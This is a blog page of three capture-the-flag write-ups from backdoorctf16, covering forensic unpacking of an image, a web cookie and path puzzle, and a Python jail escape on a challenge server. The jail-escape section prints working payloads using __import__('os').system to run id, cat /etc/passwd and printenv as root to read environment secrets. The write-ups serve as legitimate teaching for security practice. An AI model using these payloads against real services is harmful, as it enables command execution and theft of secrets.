Jun 8, 2016 - backdoorctf16 : Busybee

Author: dade

Publish Date: 2016-06-08

Category: Forensics Points: 150 Description:

A deadly virus is killing bees in Busybee’s village Busybox, India. Unfortuantely, you have to go to the village to fight the infection. Get the flag virus out of the infected files.
Village address: http://hack.bckdr.in/BUSYBEE/infected.tar
Created by: Ashish Chaudhary


Let’s unpack our infected.tar and take a look around

drwxr-xr-x  3 dade dade 4096 Jun  4 12:50 2b0fbc0e1ac044737fd881cff8164bb5a2c7bfbf90c40c87de3c3435f2c6a94e
drwxr-xr-x  4 dade dade 4096 Jun  4 12:53 983179bdb58ea980ec1fe7c45f63571d49b140bdd629f234be9c00a6edd8a4a7
drwxr-xr-x 10 dade dade 4096 Jun  4 12:51 d51a083a3b01fe8c58086903595b91fc975de59a9e9ececec755df384a181026
-rw-r--r--  1 dade dade 1344 Jun  3 09:13 eaa21323de5e2cce7078df3af4dd292181114dfc94be761b948657efbe3af26b.json
-rw-r--r--  1 dade dade  373 Dec 31  1969 manifest.json
-rw-r--r--  1 dade dade  106 Dec 31  1969 repositories

The json files don’t really have much interesting in them, looks primarily like data from building the problem. Lets dig in to 2b0fbc0e…

[email protected]:~$ ls -la infected/2b0fbc0e1ac044737fd881cff8164bb5a2c7bfbf90c40c87de3c3435f2c6a94e
-rw-r--r-- 1 dade dade  464 Jun  3 09:13 json
-rw-r--r-- 1 dade dade 1024 Jun  3 09:13 layer.tar
-rw-r--r-- 1 dade dade    3 Jun  3 09:13 VERSION

file layer.tar says “data” and tar xvf layer.tar is unable to get anything. xxd layer.tar shows us that the data is all 0s. Nothing of interest in json or VERSION

Let’s move on to 983179bd…

-rw-r--r-- 1 dade dade     907 Jun  3 09:13 json
-rw-r--r-- 1 dade dade 1035776 Jun  3 09:13 layer.tar
-rw-r--r-- 1 dade dade       3 Jun  3 09:13 VERSION

json and VERSION are probably still not particularly helpful for us, but lets unpack this layer.tar

[email protected]:~/infected/983179bdb58ea980ec1fe7c45f63571d49b140bdd629f234be9c00a6edd8a4a7$ tar xvf layer.tar 

.ash_history looks like a shell history file, let’s see if anything interesting is in there.

[email protected]:~/infected/983179bdb58ea980ec1fe7c45f63571d49b140bdd629f234be9c00a6edd8a4a7$ cat root/.ash_history
not so easy bru - the infections is intense


Hmm. This tarball also had two binaries in it. Let’s see if there is a reason those binaries specifically were included by checking them out with strings. Given the premise of the challenge, that the flag had “infected” files by a “virus”, binaries are a common target to hide in.

[email protected]:~/infected/983179bdb58ea980ec1fe7c45f63571d49b140bdd629f234be9c00a6edd8a4a7$ strings bin/sha1sum 

Well that was easy, the virus flag was in the infected binaries. Just sha256 that string and submit.


This challenge is hosted permanently at Backdoor, so go find the flag yourself!

Jun 7, 2016 - backdoorctf16 : Worst-Pwn-Ever

Author: dade

Publish Date: 2016-06-07

Category: pwn Points: 100 Description:

tocttou is an enviornmentalist. But some say he has a vicious motive and he uses nature to hide his dark side. We found a weird shell on his amazon (pun inteded) web services. Can you tell us what is he upto? Tip: he might shut down the machine if he notices you - and he will (maybe in 45 seconds).
Access: nc hack.bckdr.in 9008
Created by: Ashish Chaudhary


When we first netcat into that service, we’re simply presented with a > prompt. Let’s try a couple commands useful recon commands and see what happens.

[email protected]:~$ nc hack.bckdr.in 9008
> id
[email protected]:~$ 

Well that didn’t return anything, it just closed our session. Interesting. Let’s try another.

[email protected]:~$ nc hack.bckdr.in 9008
> whoami
NameError: name 'whoami' is not defined
[email protected]:~$ 

Well that’s interesting, we got ourselves a NameError and an angry message. I write a lot of python, so NameError is familiar to me. It looks like we’re in a python shell of some sort. A bit of googling around and I found this nice writeup about an old plaidCTF challenge called “pyjail”. This gave me some valuable information on breaking out of python jails. Let’s try to do an import.

[email protected]:~$ nc hack.bckdr.in 9008
> import os 
NameError: invalid syntax (<string>, line 1)
[email protected]:~$ 

Interesting, now we can see an invalid syntax error instead of a name not defined error. I bet since it’s prompting us for input, it’s probably got the input() module loaded. Let’s see if we can manipulate that a bit.

[email protected]:~$ nc hack.bckdr.in 9008
> input(__builtins__)
<module '__builtin__' (built-in)>import os
NameError: invalid syntax (<string>, line 1)
[email protected]:~$

Breaking out of the sandbox

Neat, now we see that we can access __builtins__. To learn more about what functions are built in, read the python docs.

Let’s see how far we can take this and try to do a call directly from the builtins.

[email protected]:~$ nc hack.bckdr.in 9008
> input(__builtins__.__import__('os'))
<module 'os' from '/usr/lib/python2.7/os.pyc'>^C
[email protected]:~$

Now we know we can import os. That’s great news for us, import os gives us access to all sorts of useful system utilities.

[email protected]:~$ nc hack.bckdr.in 9008
> input(__builtins__.__import__('os').system("id"))
uid=0(root) gid=0(root) groups=0(root)
NameError: unexpected EOF while parsing (<string>, line 0)
[email protected]:~$

In this, I hit enter because I wasn’t sure what that final 0 was doing there. It caused us to get caught and kicked out. But that’s okay, we just ran the “id” command on the target and found out this python script is running as root. Let’s try to get some other information from it.

[email protected]:~$ nc hack.bckdr.in 9008
> input(__builtins__.__import__('os').system("cat /etc/passwd"))
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
0input(__builtins__.__import__('os').system("ls -la ~"))       
total 16
drwx------  2 root root 4096 May  3 16:57 .
drwxr-xr-x 46 root root 4096 Jun  8 08:36 ..
-rw-r--r--  1 root root 3106 Feb 20  2014 .bashrc
-rw-r--r--  1 root root  140 Feb 20  2014 .profile

I discovered here that the 0 that we see is actually just another prompt where we can make another system call. I grabbed the list of users but didn’t see any usernames that looked particularly interesting. Our target is a guy named tocctou, and none of those accounts looked like they belonged to him. I then wanted to check out the contents of the root homedir, but it only had .bashrc and .profile. What else do we know about tocctou?


It is sometimes suggested that you use an environmental variable to store sensitive information that a script or something can then access when it needs that sensitve information. This is a common tactic to prevent yourself from accidentally pushing your api keys or passwords to github. We’re told in the challenge description that tocctou is a bit of an “environmentalist”, which should give us the hint that lets us wrap this all up.

[email protected]:~$ nc hack.bckdr.in 9008
> input(__builtins__.__import__('os').system("printenv"))


This challenge is hosted permanently at Backdoor, so go find the flag yourself!

Jun 7, 2016 - backdoorctf16 : Infinite Paths

Author: dade

Publish Date: 2016-06-07

Category: Web Points: 100 Description:

cr4wl3r(a basillisk) once got pissed off with feignix(fawkes the feignix) and challenged him to find the flag that was hidden in the mysterious tunnels inside his lair, the chamber of secrets. feignix now flies inside the underground tunnels attempting to find the flag. See if you(Tom) can get to the flag first with some magic tricks. Will you be able to solve this Marvelous Riddle Tom? Go here
Created by: Arpit Singla


I stumbled into a bug with the problem while trying to solve this that enabled me to completely bypass the intended solution. The contents below are how the problem was meant to be solved.


We’re chucked into this path and simply told to keep roaming. Directory traversal attacks can be useful, except usually they don’t come right out and say “change directories.” Since we’re told to keep roaming, let’s try a few quick options. Let’s add another /path to the end of the url.

Want the flag? Here it is:
"Hunh! D0 y0u 7h1nk 17'5 7h1s e4sy?"

Surely that’s not the flag, it’s taunting us that it couldn’t be this easy. Classic red herring (The guys at SDSLabs really liked the red herrings this year). Let’s also check out simply http://hack.bckdr.in/INFINITE-PATHS/. We’re presented with the same taunting message. I’d be lying if I said I didn’t go through and check almost every /path between 0 and 50 (the number of /path’s we’re presented with when the challenge begins). No luck traversing through all those directories, I suppose it’s a good time to pull up fiddler, though you could also use burp suite if you have it setup.

Once we’re monitoring fiddler, I opened up a clean browser instance so that I could mimic the very first interaction I had with the site.

Here we can see a ton of cookies are set. Fitting, since we’re a ton of directories into the site. Let’s send another request so that we can clone a request without having to manually transform those Set-Cookie headers into a format suitable for a GET request.

Now let’s go to the raw tab and copy the entire request we just sent so that we can do some modifying. Copy the request and then go to the Composer tab and paste it in. Be sure to have one blank line at the end of your request, otherwise it’s not a valid request. Let’s start off by removing the first cookie we see on the list and see what happens.

Fascinating! We’ve gained useful information here. Let’s try to remove another cookie from the front of the list and see what happens.

Of course, that would have been too easy. Since there were a ton of /path’s in the url, and a ton of cookies, let’s count them both and see how they relate. I simply pasted the entire get request into sublime text and did a find on /path to get a count, and a find on infinite_paths= to get a count of the cookies. In our original request we had 51 cookies and only 50 paths.


Now that we know there were originally 51 cookies being set at once and 50 paths, and that when we removed one cookie such that count(cookies) == count(paths), we were presented with one character of a 50 character flag. To confirm this we’ll simply try to remove the first two cookies again, and this time also remove one of the /paths.

We’re sending 49 paths, and 49 cookies we’re actually only sending the first infinite_paths cookie on our list, since they all have the same name. I just kept the entire list of them handy and continued to pop one off the front in order to keep my place.

Fantastic, our suspicion is confirmed and we can move on. You simply need to iterate through all 50 characters, popping one cookie off the front of the list every time. When we’ve finished we reach the last character of the flag.

When you put all the characters you’re presented with together, you should realize that it doesn’t really make much sense. It begins with a period and ends with a capital letter. Let’s go ahead and reverse that, which you can quickly do in python like so:

python -c 'print "TheFlagYouFind"[::-1]'

My Accidental Solution

During some testing, I accidentally sent a GET request that contained %20 at the end of the request, immediately following the final /path. This presented me with a character of the flag. Upon a bit more investigation, I was able to obtain every character of the flag by simply putting something unexpected at the end of the string for every iteration of the /path list, completely bypassing the cookie challenge. This was not the intended solution and I informed the author.



This challenge is hosted permanently at Backdoor, so go find the flag yourself!